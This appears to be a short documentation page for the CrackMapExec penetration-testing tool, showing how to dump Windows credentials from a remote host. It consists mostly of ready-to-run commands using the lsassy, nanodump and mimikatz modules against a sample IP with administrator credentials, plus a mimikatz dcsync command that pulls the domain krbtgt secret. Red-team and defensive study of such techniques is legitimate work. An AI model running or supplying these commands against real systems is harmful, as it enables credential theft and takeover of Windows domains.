Dump LSASS

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
Using Lsassy
Using the module Lsassy from @pixis you can dump remotely the credentials 
1
#~ cme smb 192.168.255.131 -u administrator -p pass -M lsassy
Copied!
Using nanodump
Using the module nanodump you can dump remotely the credentials 
1
#~ cme smb 192.168.255.131 -u administrator -p pass -M nanodump
Copied!
Using Mimikatz (deprecated)
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
Using the module Mimikatz, the powershell script Invoke-mimikatz.ps1 will be executed on the remote target
1
#~ cme smb 192.168.255.131 -u administrator -p pass -M mimikatz
Copied!
1
#~ cme smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
Copied!

Dump NTDS.dit

Dump WIFI password

Last modified 24d ago

Copy link

Contents

Using Lsassy

Using nanodump

Using Mimikatz (deprecated)